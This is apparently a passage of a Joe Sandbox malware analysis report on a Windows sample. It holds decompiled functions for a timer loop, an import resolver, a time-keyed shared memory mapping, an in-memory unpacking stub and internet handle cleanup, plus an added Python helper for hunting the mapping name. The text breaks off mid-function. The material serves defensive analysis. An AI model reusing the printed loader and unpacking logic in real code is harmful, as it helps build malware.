          					_t53 = WaitForMultipleObjects(2,  &_v80, 0, 0xffffffff);
          					_v108 = _t53;
          					if(_t53 == 0) {
          						if(_a8 != 0) {
          							L4:
          							 *0x5ea2ec = 5;
          						} else {
          							_t69 = E005E5251(_t76); // executed
          							if(_t69 != 0) {
          								goto L4;
          							}
          						}
          						_v104.LowPart = 0;
          						L6:
          						L6:
          						if(_v104.LowPart == 1 && ( *0x5ea300 & 0x00000001) == 0) {
          							_v104.LowPart = 2;
          						}
          						_t74 = _v104.LowPart;
          						_t58 = _t74 << 4;
          						_t78 = _t89 + (_t74 << 4) + 0x38;
          						_t75 = _t74 + 1;
          						_v92.LowPart = _t74 + 1;
          						_t61 = E005E35D2( &_v96, _t75, _t89 + _t58 + 0x38, _t78,  &_v100); // executed
          						_v124 = _t61;
          						if(_t61 != 0) {
          							goto L17;
          						}
          						_t66 = _v92;
          						_v104.LowPart = _t66;
          						if(_t66 != 3) {
          							goto L6;
          						} else {
          							_v124.HighPart = E005E69E6(_t75,  &_v72, _a4, _a8);
          						}
          						goto L12;
          						L17:
          						__eflags = _t61 - 0x10d2;
          						if(_t61 != 0x10d2) {
          							_push(0xffffffff);
          							_push(0xff676980);
          							_push(0);
          							_push( *0x5ea2e4);
          							goto L21;
          						} else {
          							__eflags =  *0x5ea2e8; // 0x0
          							if(__eflags == 0) {
          								goto L12;
          							} else {
          								_t61 = E005E63F6();
          								_push(0xffffffff);
          								_push(0xdc3cba00);
          								_push(0);
          								_push( *0x5ea2e8);
          								L21:
          								L005E82DA();
          								_v104.LowPart = _t61;
          								_v100 = _t78;
          								SetWaitableTimer(_v96,  &_v104, 0, 0, 0, 0); // executed
          								_t65 = WaitForMultipleObjects(2,  &_v100, 0, 0xffffffff);
          								_v128 = _t65;
          								__eflags = _t65;
          								if(_t65 == 0) {
          									goto L6;
          								} else {
          									goto L12;
          								}
          							}
          						}
          						L25:
          					}
          					L12:
          					_t82 =  &_v72;
          					_t73 = 3;
          					do {
          						_t54 =  *_t82;
          						if(_t54 != 0) {
          							HeapFree( *0x5ea2d8, 0, _t54);
          						}
          						_t82 =  &(_t82[4]);
          						_t73 = _t73 - 1;
          					} while (_t73 != 0);
          					CloseHandle(_v80);
          				}
          				return _v92.HighPart;
          				goto L25;
          			}
          0x005e6815
          0x005e682b
          0x005e682f
          0x005e6834
          0x005e683b
          0x005e6841
          0x005e6847
          0x005e69ce
          0x005e684d
          0x005e684d
          0x005e684f
          0x005e6854
          0x005e6855
          0x005e685b
          0x005e685f
          0x005e6863
          0x005e6871
          0x005e687f
          0x005e6883
          0x005e6885
          0x005e6892
          0x005e689e
          0x005e68a0
          0x005e68a6
          0x005e68af
          0x005e68ba
          0x005e68ba
          0x005e68b1
          0x005e68b1
          0x005e68b8
          0x00000000
          0x00000000
          0x005e68b8
          0x005e68c4
          0x00000000
          0x005e68c8
          0x005e68cd
          0x005e68d8
          0x005e68d8
          0x005e68e0
          0x005e68e6
          0x005e68ee
          0x005e68f7
          0x005e68fe
          0x005e6902
          0x005e6907
          0x005e690d
          0x00000000
          0x00000000
          0x005e690f
          0x005e6913
          0x005e691a
          0x00000000
          0x005e691c
          0x005e692c
          0x005e692c
          0x00000000
          0x005e695d
          0x005e695d
          0x005e6962
          0x005e6981
          0x005e6983
          0x005e6988
          0x005e6989
          0x00000000
          0x005e6964
          0x005e6964
          0x005e696a
          0x00000000
          0x005e696c
          0x005e696c
          0x005e6971
          0x005e6973
          0x005e6978
          0x005e6979
          0x005e698f
          0x005e698f
          0x005e6997
          0x005e69a5
          0x005e69a9
          0x005e69b5
          0x005e69b7
          0x005e69bb
          0x005e69bd
          0x00000000
          0x005e69c3
          0x00000000
          0x005e69c3
          0x005e69bd
          0x005e696a
          0x00000000
          0x005e6962
          0x005e6930
          0x005e6932
          0x005e6936
          0x005e6937
          0x005e6937
          0x005e693b
          0x005e6945
          0x005e6945
          0x005e694b
          0x005e694e
          0x005e694e
          0x005e6955
          0x005e6955
          0x005e69dc
          0x00000000

          APIs
          • memset.NTDLL ref: 005E682F
          • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 005E683B
          • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 005E6863
          • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 005E6883
          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,?,?,?,?,?,?,?,?,005E26E9,?), ref: 005E689E
          • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,005E26E9,?,00000000), ref: 005E6945
          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,005E26E9,?,00000000,?,?), ref: 005E6955
          • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 005E698F
          • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,?), ref: 005E69A9
          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 005E69B5
            • Part of subcall function 005E5251: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,02BC9218,00000000,?,7476F710,00000000,7476F730), ref: 005E52A0
            • Part of subcall function 005E5251: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,02BC9160,?,00000000,30314549,00000014,004F0053,02BC9270), ref: 005E533D
            • Part of subcall function 005E5251: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,005E68B6), ref: 005E534F
          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,005E26E9,?,00000000,?,?), ref: 005E69C8
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.580662493.00000000005E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 005E0000, based on PE: true
          • Associated: 00000000.00000002.580658299.00000000005E0000.00000004.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580668636.00000000005E9000.00000002.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580672954.00000000005EA000.00000004.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580678713.00000000005EC000.00000002.10000000.00040000.00000000.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5e0000_server_(3).jbxd
          Similarity
          • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
          • String ID: Uqt$@MqtNqt
          • API String ID: 3521023985-3266969629
          • Opcode ID: 696e31d450aab37b287cb21feb923ed8be8933a4b1a6ea4d779786d823fbfa4a
          • Instruction ID: 2e9c189897c84c9787a93719211dabcb074022a504d3285625eb539476054cd9
          • Opcode Fuzzy Hash: 696e31d450aab37b287cb21feb923ed8be8933a4b1a6ea4d779786d823fbfa4a
          • Instruction Fuzzy Hash: 48517E71408390AFC7159F228C889ABBFE8FB987A0F504A1AF5D5D6191D730D548DF92
          Uniqueness

          Uniqueness Score: -1.00%

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 181 5e7fc5-5e802a 182 5e802c-5e8046 RaiseException 181->182 183 5e804b-5e8075 181->183 184 5e81fb-5e81ff 182->184 185 5e807a-5e8086 183->185 186 5e8077 183->186 187 5e8088-5e8093 185->187 188 5e8099-5e809b 185->188 186->185 187->188 196 5e81de-5e81e5 187->196 189 5e8143-5e814d 188->189 190 5e80a1-5e80a8 188->190 194 5e814f-5e8157 189->194 195 5e8159-5e815b 189->195 192 5e80aa-5e80b6 190->192 193 5e80b8-5e80c5 LoadLibraryA 190->193 192->193 197 5e8108-5e8114 InterlockedExchange 192->197 193->197 198 5e80c7-5e80d7 193->198 194->195 199 5e815d-5e8160 195->199 200 5e81d9-5e81dc 195->200 205 5e81f9 196->205 206 5e81e7-5e81f4 196->206 201 5e813c-5e813d FreeLibrary 197->201 202 5e8116-5e811a 197->202 214 5e80d9-5e80e5 198->214 215 5e80e7-5e8103 RaiseException 198->215 207 5e818e-5e819c GetProcAddress 199->207 208 5e8162-5e8165 199->208 200->196 201->189 202->189 210 5e811c-5e8128 LocalAlloc 202->210 205->184 206->205 207->200 209 5e819e-5e81ae 207->209 208->207 212 5e8167-5e8172 208->212 220 5e81ba-5e81bc 209->220 221 5e81b0-5e81b8 209->221 210->189 213 5e812a-5e813a 210->213 212->207 216 5e8174-5e817a 212->216 213->189 214->197 214->215 215->184 216->207 218 5e817c-5e817f 216->218 218->207 219 5e8181-5e818c 218->219 219->200 219->207 220->200 223 5e81be-5e81d6 RaiseException 220->223 221->220 223->200
          C-Code - Quality: 51%
          			E005E7FC5(long _a4, long _a8) {
          				signed int _v8;
          				intOrPtr _v16;
          				LONG* _v28;
          				long _v40;
          				long _v44;
          				long _v48;
          				CHAR* _v52;
          				long _v56;
          				CHAR* _v60;
          				long _v64;
          				signed int* _v68;
          				char _v72;
          				signed int _t76;
          				signed int _t80;
          				signed int _t81;
          				intOrPtr* _t82;
          				intOrPtr* _t83;
          				intOrPtr* _t85;
          				intOrPtr* _t90;
          				intOrPtr* _t95;
          				intOrPtr* _t98;
          				struct HINSTANCE__* _t99;
          				void* _t102;
          				intOrPtr* _t104;
          				void* _t115;
          				long _t116;
          				void _t125;
          				void* _t131;
          				signed short _t133;
          				struct HINSTANCE__* _t138;
          				signed int* _t139;
          
          				_t139 = _a4;
          				_v28 = _t139[2] + 0x5e0000;
          				_t115 = _t139[3] + 0x5e0000;
          				_t131 = _t139[4] + 0x5e0000;
          				_v8 = _t139[7];
          				_v60 = _t139[1] + 0x5e0000;
          				_v16 = _t139[5] + 0x5e0000;
          				_v64 = _a8;
          				_v72 = 0x24;
          				_v68 = _t139;
          				_v56 = 0;
          				asm("stosd");
          				_v48 = 0;
          				_v44 = 0;
          				_v40 = 0;
          				if(( *_t139 & 0x00000001) == 0) {
          					_a8 =  &_v72;
          					RaiseException(0xc06d0057, 0, 1,  &_a8);
          					return 0;
          				}
          				_t138 =  *_v28;
          				_t76 = _a8 - _t115 >> 2 << 2;
          				_t133 =  *(_t131 + _t76);
          				_a4 = _t76;
          				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
          				_v56 = _t80;
          				_t81 = _t133 + 0x5e0002;
          				if(_t80 == 0) {
          					_t81 = _t133 & 0x0000ffff;
          				}
          				_v52 = _t81;
          				_t82 =  *0x5ea1c0; // 0x0
          				_t116 = 0;
          				if(_t82 == 0) {
          					L6:
          					if(_t138 != 0) {
          						L18:
          						_t83 =  *0x5ea1c0; // 0x0
          						_v48 = _t138;
          						if(_t83 != 0) {
          							_t116 =  *_t83(2,  &_v72);
          						}
          						if(_t116 != 0) {
          							L32:
          							 *_a8 = _t116;
          							L33:
          							_t85 =  *0x5ea1c0; // 0x0
          							if(_t85 != 0) {
          								_v40 = _v40 & 0x00000000;
          								_v48 = _t138;
          								_v44 = _t116;
          								 *_t85(5,  &_v72);
          							}
          							return _t116;
          						} else {
          							if(_t139[5] == _t116 || _t139[7] == _t116) {
          								L27:
          								_t116 = GetProcAddress(_t138, _v52);
          								if(_t116 == 0) {
          									_v40 = GetLastError();
          									_t90 =  *0x5ea1bc; // 0x0
          									if(_t90 != 0) {
          										_t116 =  *_t90(4,  &_v72);
          									}
          									if(_t116 == 0) {
          										_a4 =  &_v72;
          										RaiseException(0xc06d007f, _t116, 1,  &_a4);
          										_t116 = _v44;
          									}
          								}
          								goto L32;
          							} else {
          								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
          								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
          									_t116 =  *(_a4 + _v16);
          									if(_t116 != 0) {
          										goto L32;
          									}
          								}
          								goto L27;
          							}
          						}
          					}
          					_t98 =  *0x5ea1c0; // 0x0
          					if(_t98 == 0) {
          						L9:
          						_t99 = LoadLibraryA(_v60); // executed
          						_t138 = _t99;
          						if(_t138 != 0) {
          							L13:
          							if(InterlockedExchange(_v28, _t138) == _t138) {
          								FreeLibrary(_t138);
          							} else {
          								if(_t139[6] != 0) {
          									_t102 = LocalAlloc(0x40, 8);
          									if(_t102 != 0) {
          										 *(_t102 + 4) = _t139;
          										_t125 =  *0x5ea1b8; // 0x0
          										 *_t102 = _t125;
          										 *0x5ea1b8 = _t102;
          									}
          								}
          							}
          							goto L18;
          						}
          						_v40 = GetLastError();
          						_t104 =  *0x5ea1bc; // 0x0
          						if(_t104 == 0) {
          							L12:
          							_a8 =  &_v72;
          							RaiseException(0xc06d007e, 0, 1,  &_a8);
          							return _v44;
          						}
          						_t138 =  *_t104(3,  &_v72);
          						if(_t138 != 0) {
          							goto L13;
          						}
          						goto L12;
          					}
          					_t138 =  *_t98(1,  &_v72);
          					if(_t138 != 0) {
          						goto L13;
          					}
          					goto L9;
          				}
          				_t116 =  *_t82(0,  &_v72);
          				if(_t116 != 0) {
          					goto L33;
          				}
          				goto L6;
          			}
          0x005e7fd4
          0x005e7fea
          0x005e7ff0
          0x005e7ff2
          0x005e7ff7
          0x005e7ffd
          0x005e8002
          0x005e8005
          0x005e8013
          0x005e801a
          0x005e801d
          0x005e8020
          0x005e8021
          0x005e8024
          0x005e8027
          0x005e802a
          0x005e802f
          0x005e803e
          0x00000000
          0x005e8044
          0x005e804e
          0x005e8058
          0x005e805d
          0x005e805f
          0x005e8069
          0x005e806c
          0x005e806f
          0x005e8075
          0x005e8077
          0x005e8077
          0x005e807a
          0x005e807d
          0x005e8082
          0x005e8086
          0x005e8099
          0x005e809b
          0x005e8143
          0x005e8143
          0x005e814a
          0x005e814d
          0x005e8157
          0x005e8157
          0x005e815b
          0x005e81d9
          0x005e81dc
          0x005e81de
          0x005e81de
          0x005e81e5
          0x005e81e7
          0x005e81f1
          0x005e81f4
          0x005e81f7
          0x005e81f7
          0x00000000
          0x005e815d
          0x005e8160
          0x005e818e
          0x005e8198
          0x005e819c
          0x005e81a4
          0x005e81a7
          0x005e81ae
          0x005e81b8
          0x005e81b8
          0x005e81bc
          0x005e81c1
          0x005e81d0
          0x005e81d6
          0x005e81d6
          0x005e81bc
          0x00000000
          0x005e8167
          0x005e816a
          0x005e8172
          0x005e8187
          0x005e818c
          0x00000000
          0x00000000
          0x005e818c
          0x00000000
          0x005e8172
          0x005e8160
          0x005e815b
          0x005e80a1
          0x005e80a8
          0x005e80b8
          0x005e80bb
          0x005e80c1
          0x005e80c5
          0x005e8108
          0x005e8114
          0x005e813d
          0x005e8116
          0x005e811a
          0x005e8120
          0x005e8128
          0x005e812a
          0x005e812d
          0x005e8133
          0x005e8135
          0x005e8135
          0x005e8128
          0x005e811a
          0x00000000
          0x005e8114
          0x005e80cd
          0x005e80d0
          0x005e80d7
          0x005e80e7
          0x005e80ea
          0x005e80fa
          0x00000000
          0x005e8100
          0x005e80e1
          0x005e80e5
          0x00000000
          0x00000000
          0x00000000
          0x005e80e5
          0x005e80b2
          0x005e80b6
          0x00000000
          0x00000000
          0x00000000
          0x005e80b6
          0x005e808f
          0x005e8093
          0x00000000
          0x00000000
          0x00000000

          APIs
          • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 005E803E
          • LoadLibraryA.KERNELBASE(?), ref: 005E80BB
          • GetLastError.KERNEL32 ref: 005E80C7
          • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 005E80FA
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.580662493.00000000005E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 005E0000, based on PE: true
          • Associated: 00000000.00000002.580658299.00000000005E0000.00000004.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580668636.00000000005E9000.00000002.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580672954.00000000005EA000.00000004.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580678713.00000000005EC000.00000002.10000000.00040000.00000000.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5e0000_server_(3).jbxd
          Similarity
          • API ID: ExceptionRaise$ErrorLastLibraryLoad
          • String ID: $$@MqtNqt
          • API String ID: 948315288-516465142
          • Opcode ID: a06a9a5b329b4f0939bbae2b4c5f763b1a7e9fd4d96da416f0762adbe3df5971
          • Instruction ID: 9f4edfd0f70f9fa2b6612637495ff1cf2665bb0a2372246a78dc7ec58e7d4d26
          • Opcode Fuzzy Hash: a06a9a5b329b4f0939bbae2b4c5f763b1a7e9fd4d96da416f0762adbe3df5971
          • Instruction Fuzzy Hash: B0811D71A00645AFDB18CFA9D884BAEBBF5FF58310F144429E989E7350EB70EA45CB50
          Uniqueness

          Uniqueness Score: -1.00%

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 225 5e415a-5e41c7 GetSystemTimeAsFileTime _aulldiv _snwprintf CreateFileMappingW 226 5e420f-5e4215 225->226 227 5e41c9-5e41d6 GetLastError 225->227 234 5e4217-5e421c 226->234 228 5e41dd-5e41ee MapViewOfFile 227->228 229 5e41d8-5e41db 227->229 232 5e41fe-5e4204 GetLastError 228->232 233 5e41f0-5e41fc 228->233 231 5e4206-5e420d CloseHandle 229->231 231->234 232->231 232->234 233->234
          C-Code - Quality: 74%
          			E005E415A(intOrPtr __edx, void** _a4, void** _a8) {
          				intOrPtr _v8;
          				struct _FILETIME* _v12;
          				short _v56;
          				struct _FILETIME* _t12;
          				intOrPtr _t13;
          				void* _t17;
          				void* _t21;
          				intOrPtr _t27;
          				long _t28;
          				void* _t30;
          
          				_t27 = __edx;
          				_t12 =  &_v12;
          				GetSystemTimeAsFileTime(_t12);
          				_push(0x192);
          				_push(0x54d38000);
          				_push(_v8);
          				_push(_v12);
          				L005E82D4();
          				_push(_t12);
          				_v12 = _t12;
          				_t13 =  *0x5ea348; // 0x25dd5a8
          				_t5 = _t13 + 0x5eb7b4; // 0x2bc8d5c
          				_t6 = _t13 + 0x5eb644; // 0x530025
          				_push(0x16);
          				_push( &_v56);
          				_v8 = _t27;
          				L005E7F3A();
          				_t17 = CreateFileMappingW(0xffffffff, 0x5ea34c, 4, 0, 0x1000,  &_v56); // executed
          				_t30 = _t17;
          				if(_t30 == 0) {
          					_t28 = GetLastError();
          				} else {
          					if(GetLastError() == 0xb7) {
          						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
          						if(_t21 == 0) {
          							_t28 = GetLastError();
          							if(_t28 != 0) {
          								goto L6;
          							}
          						} else {
          							 *_a4 = _t30;
          							 *_a8 = _t21;
          							_t28 = 0;
          						}
          					} else {
          						_t28 = 2;
          						L6:
          						CloseHandle(_t30);
          					}
          				}
          				return _t28;
          			}













          0x005e415a
          0x005e4162
          0x005e4166
          0x005e416c
          0x005e4171
          0x005e4176
          0x005e4179
          0x005e417c
          0x005e4181
          0x005e4182
          0x005e4185
          0x005e418a
          0x005e4191
          0x005e419b
          0x005e419d
          0x005e419e
          0x005e41a1
          0x005e41bd
          0x005e41c3
          0x005e41c7
          0x005e4215
          0x005e41c9
          0x005e41d6
          0x005e41e6
          0x005e41ee
          0x005e4200
          0x005e4204
          0x00000000
          0x00000000
          0x005e41f0
          0x005e41f3
          0x005e41f8
          0x005e41fa
          0x005e41fa
          0x005e41d8
          0x005e41da
          0x005e4206
          0x005e4207
          0x005e4207
          0x005e41d6
          0x005e421c

          APIs
          • GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,?,?,?,?,?,?,005E25B1,?,?,4D283A53,?,?), ref: 005E4166
          • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 005E417C
          • _snwprintf.NTDLL ref: 005E41A1
          • CreateFileMappingW.KERNELBASE(000000FF,005EA34C,00000004,00000000,00001000,?,?,?,?,?,00000000), ref: 005E41BD
          • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,005E25B1,?,?,4D283A53,?), ref: 005E41CF
          • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,?,?,?,00000000), ref: 005E41E6
          • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,?,?,?,?,?,005E25B1,?,?,4D283A53), ref: 005E4207
          • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,005E25B1,?,?,4D283A53,?), ref: 005E420F
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.580662493.00000000005E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 005E0000, based on PE: true
          • Associated: 00000000.00000002.580658299.00000000005E0000.00000004.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580668636.00000000005E9000.00000002.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580672954.00000000005EA000.00000004.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580678713.00000000005EC000.00000002.10000000.00040000.00000000.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5e0000_server_(3).jbxd
          Similarity
          • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
          • String ID: @MqtNqt
          • API String ID: 1814172918-2883916605
          • Opcode ID: 1896fdf51b65086510445f532694e456ed312752eca32065ad12cfe4aea071f4
          • Instruction ID: f7ec9c92dca3c7f4929c140db449cd059e75d57f1b96e9843123322a63de6e9f
          • Opcode Fuzzy Hash: 1896fdf51b65086510445f532694e456ed312752eca32065ad12cfe4aea071f4
          • Instruction Fuzzy Hash: C921D5B6640284BBDB29DF65CC49F9E3BB9BB94750F210020F685EB2D0D7709905DB50
          Uniqueness

          Uniqueness Score: -1.00%
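The E005E415A listing above divides the current FILETIME by a 64-bit constant (the two dwords pushed to _aulldiv, 0x192 high and 0x54d38000 low), hands the quotient to _snwprintf to build a mapping name, and returns 0 only when CreateFileMappingW reports ERROR_ALREADY_EXISTS (0xb7) and MapViewOfFile succeeds; a mapping it had to create itself is closed again and 2 is returned, so the routine attaches to a section another instance created in the same time window. The following Python is an added example written for this report, not code from the sample or from Joe Sandbox: it reproduces that arithmetic so the period of the name and the value formatted into it can be checked. All function and constant names are mine; the sample's format string is read from its decrypted string table and is not in the report, so only the numeric value it receives is reproduced.

```python
"""
Added example for the E005E415A listing (not code from the sample or from
Joe Sandbox). Reproduces the FILETIME arithmetic that feeds the mapping name.
Names are mine; the sample's format string is not in the report.
"""
import struct
from datetime import datetime, timedelta, timezone

# _aulldiv(low, high, 0x54d38000, 0x192): unsigned 64-bit divide of the current
# FILETIME by the constant whose dwords were pushed as 0x192 / 0x54d38000.
DIVISOR = (0x192 << 32) | 0x54D38000   # 1_728_000_000_000 ticks of 100 ns
TICKS_PER_SECOND = 10_000_000
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def divisor_period() -> timedelta:
    """How long one quotient value stays constant: 172_800 s, i.e. 48 hours."""
    return timedelta(seconds=DIVISOR // TICKS_PER_SECOND)


def to_filetime(dt: datetime) -> int:
    """Aware datetime -> FILETIME ticks (what GetSystemTimeAsFileTime fills in)."""
    delta = dt.astimezone(timezone.utc) - FILETIME_EPOCH
    return (delta.days * 86400 + delta.seconds) * TICKS_PER_SECOND + delta.microseconds * 10


def filetime_dwords(ft: int) -> tuple:
    """Split a FILETIME into the (low, high) dwords that are pushed to _aulldiv."""
    return ft & 0xFFFFFFFF, (ft >> 32) & 0xFFFFFFFF


def filetime_bucket(ft: int) -> int:
    """The quotient: the value the sample keeps in _v12 and passes to _snwprintf."""
    return ft // DIVISOR


def time_bucket(dt: datetime) -> int:
    return filetime_bucket(to_filetime(dt))


def bucket_start(bucket: int) -> datetime:
    """First instant that yields this quotient; useful to bound a hunt window."""
    return FILETIME_EPOCH + timedelta(seconds=bucket * (DIVISOR // TICKS_PER_SECOND))


def dword_as_utf16(value: int) -> str:
    """Read a 32-bit immediate as two little-endian UTF-16 units. The decompiler
    annotates the format-string pointer with 0x530025, which reads as '%S';
    that is consistent with _snwprintf building a wide-character name."""
    return struct.pack("<I", value).decode("utf-16-le")


if __name__ == "__main__":
    now = datetime.now(timezone.utc)
    b = time_bucket(now)
    low, high = filetime_dwords(to_filetime(now))
    print(f"FILETIME low=0x{low:08x} high=0x{high:08x} -> bucket {b}")
    print(f"bucket window: starts {bucket_start(b)}, lasts {divisor_period()}")
    print(dword_as_utf16(0x530025))
```

Because the quotient only changes every 48 hours, two instances started within the same window compute the same name, which is what the ERROR_ALREADY_EXISTS branch relies on; `bucket_start` gives the boundary to use when correlating the section name seen on one host with the time another host was infected.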

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 257 5c003c-5c0047 258 5c004c-5c0263 call 5c0a3f call 5c0e0f call 5c0d90 VirtualAlloc 257->258 259 5c0049 257->259 275 5c028b-5c0292 258->275 276 5c0265-5c0289 call 5c0a69 258->276 259->258 277 5c02a1-5c02b0 275->277 279 5c02ce-5c03c2 VirtualProtect call 5c0cce call 5c0ce7 276->279 277->279 280 5c02b2-5c02cc 277->280 287 5c03d1-5c03e0 279->287 280->279 282 5c0294-5c029b 280->282 282->277 288 5c0439-5c04b8 VirtualFree 287->288 289 5c03e2-5c0437 call 5c0ce7 287->289 291 5c04be-5c04cd 288->291 292 5c05f4-5c05fe 288->292 289->287 294 5c04d3-5c04dd 291->294 295 5c077f-5c0789 292->295 296 5c0604-5c060d 292->296 294->292 300 5c04e3-5c0505 LoadLibraryA 294->300 298 5c078b-5c07a3 295->298 299 5c07a6-5c07b0 295->299 296->295 301 5c0613-5c0637 296->301 298->299 302 5c086e-5c08be LoadLibraryA 299->302 303 5c07b6-5c07cb 299->303 304 5c0517-5c0520 300->304 305 5c0507-5c0515 300->305 306 5c063e-5c0648 301->306 310 5c08c7-5c08f9 302->310 307 5c07d2-5c07d5 303->307 308 5c0526-5c0547 304->308 305->308 306->295 309 5c064e-5c065a 306->309 311 5c0824-5c0833 307->311 312 5c07d7-5c07e0 307->312 313 5c054d-5c0550 308->313 309->295 314 5c0660-5c066a 309->314 316 5c08fb-5c0901 310->316 317 5c0902-5c091d 310->317 315 5c0839-5c083c 311->315 318 5c07e4-5c0822 312->318 319 5c07e2 312->319 320 5c0556-5c056b 313->320 321 5c05e0-5c05ef 313->321 322 5c067a-5c0689 314->322 315->302 323 5c083e-5c0847 315->323 316->317 318->307 319->311 326 5c056d 320->326 327 5c056f-5c057a 320->327 321->294 324 5c068f-5c06b2 322->324 325 5c0750-5c077a 322->325 330 5c0849 323->330 331 5c084b-5c086c 323->331 332 5c06ef-5c06fc 324->332 333 5c06b4-5c06ed 324->333 325->306 326->321 328 5c057c-5c0599 327->328 329 5c059b-5c05bb 327->329 341 5c05bd-5c05db 328->341 329->341 330->302 331->315 335 5c06fe-5c0748 332->335 336 5c074b 332->336 333->332 335->336 336->322 341->313
          APIs
          • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 005C024D
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.580647391.00000000005C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005C0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5c0000_server_(3).jbxd
          Yara matches
          Similarity
          • API ID: AllocVirtual
          • String ID: cess$kernel32.dll
          • API String ID: 4275171209-1230238691
          • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
          • Instruction ID: 6ecb9a989f5fd5804ff419ab53124b423b4e5802c40885b424a45b5415c66c11
          • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
          • Instruction Fuzzy Hash: D2526974A01229DFDB64CF98C985BA8BBB1BF09304F1480D9E54DAB391DB30AE95DF14
          Uniqueness

          Uniqueness Score: -1.00%

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 342 5e4be7-5e4bf2 343 5e4bfe-5e4c11 342->343 344 5e4bf4-5e4bf9 call 5e16b2 342->344 346 5e4c1c-5e4c21 343->346 347 5e4c13-5e4c1a InternetSetStatusCallback InternetCloseHandle 343->347 344->343 348 5e4c2c-5e4c31 346->348 349 5e4c23-5e4c2a InternetSetStatusCallback InternetCloseHandle 346->349 347->346 350 5e4c3c-5e4c47 348->350 351 5e4c33-5e4c3a InternetSetStatusCallback InternetCloseHandle 348->351 349->348 352 5e4c4c-5e4c51 350->352 353 5e4c49-5e4c4a CloseHandle 350->353 351->350 354 5e4c56-5e4c5d 352->354 355 5e4c53-5e4c54 CloseHandle 352->355 353->352 356 5e4c5f-5e4c68 call 5e61da 354->356 357 5e4c6b-5e4c70 354->357 355->354 356->357 359 5e4c78-5e4c7c 357->359 360 5e4c72-5e4c73 call 5e61da 357->360 363 5e4c7e-5e4c7f call 5e61da 359->363 364 5e4c84-5e4c89 359->364 360->359 363->364 366 5e4c8b-5e4c8c call 5e61da 364->366 367 5e4c91-5e4c93 364->367 366->367
          C-Code - Quality: 93%
          			E005E4BE7(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi) {
          				void* _t17;
          				void* _t18;
          				void* _t19;
          				void* _t20;
          				void* _t21;
          				intOrPtr _t24;
          				void* _t37;
          				void* _t41;
          				intOrPtr* _t45;
          
          				_t41 = __edi;
          				_t37 = __ebx;
          				_t45 = __eax;
          				_t16 =  *((intOrPtr*)(__eax + 0x20));
          				if( *((intOrPtr*)(__eax + 0x20)) != 0) {
          					E005E16B2(_t16, __ecx, 0xea60);
          				}
          				_t17 =  *(_t45 + 0x18);
          				_push(_t37);
          				_push(_t41);
          				if(_t17 != 0) {
          					InternetSetStatusCallback(_t17, 0);
          					InternetCloseHandle( *(_t45 + 0x18)); // executed
          				}
          				_t18 =  *(_t45 + 0x14);
          				if(_t18 != 0) {
          					InternetSetStatusCallback(_t18, 0);
          					InternetCloseHandle( *(_t45 + 0x14));
          				}
          				_t19 =  *(_t45 + 0x10);
